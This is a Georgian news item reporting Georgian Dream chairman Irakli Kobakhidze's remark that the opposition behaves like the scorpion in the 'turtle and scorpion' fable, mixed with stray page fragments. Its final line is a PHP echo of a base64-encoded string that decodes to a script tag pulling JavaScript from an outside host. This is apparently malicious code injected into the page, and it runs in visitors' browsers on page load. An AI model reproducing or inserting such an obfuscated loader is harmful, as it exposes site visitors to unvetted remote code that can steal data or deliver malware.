celsiusi
ავერსი შნაიდერი
პარტია "ქართული ოცნების" თავმჯდომარემ ირაკლი კობახიძემ, საქართველოს პირველი არხის ეთერში განაცხადა, რომ  ხელისუფლება „ნაციონალური მოძრაობის“ ბუნებიდან გამომდინარე მუდმივად „კუ და მორიელის“ იგავ-არაკშია.
 
ჟურნალისტის კითხვაზე, აქვს თუ არა ხელისუფლებას მოლოდინი, რომ ბოიკოტის რეჟიმში მყოფი ოპოზიცია სამუშაო ჯგუფებში ჩაერთვება დასავლელი პარტნიორების გზავნილებიდან გამომდინარე, სადაც ისინი მკაფიოდ მიუთითებენ, რომ მათი სურვილია, პროცესში ოპოზიციის სრული სპექტრი ჩაერთოს, კობახიძემ აღნიშნა, რომ კარი ღიაა და მათ ამის გაკეთება ნებისმიერ დროს შეუძლიათ.
 
„ჩვენ ჩვენს საქმიანობაზე შეგვიძლია, ავიღოთ პასუხისმგებლობა. რაც შეეხება ოპოზიციას, მათი საქმეა, რას გააკეთებენ და რას არა, ჩვენ, ასეც და ისეც, კეთილსინდისიერად უზრუნველვყოფთ 12-ვე პუნქტის შესრულებას ევროპული სტანდარტების მიხედვით
 
ჩვენ მუდმივად ვართ „კუ და მორიელის“ იგავ-არაკში. დაისვამ ზურგზე და კბენის მეტი არაფერი შეუძლიათ. მათ არ შეუძლიათ, რაღაც პროცესში შემოვიდნენ კონსტრუქციულად. ეს არის მათი ბუნება. ასე იყვნენ ცხრა წელი, ხელისუფლებაში ყოფნის დროს და ახლაც იგივეა, 10 წელი, როცა ოპოზიციაში არიან. როცა საუბარი გვაქვს „კუ და მორიელზე, აქ კუ არის არა „ქართული ოცნება“, არამედ ქართული სახელმწიფო“, – განაცხადა ირაკლი კობახიძემ.
 
 
 
 
538
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");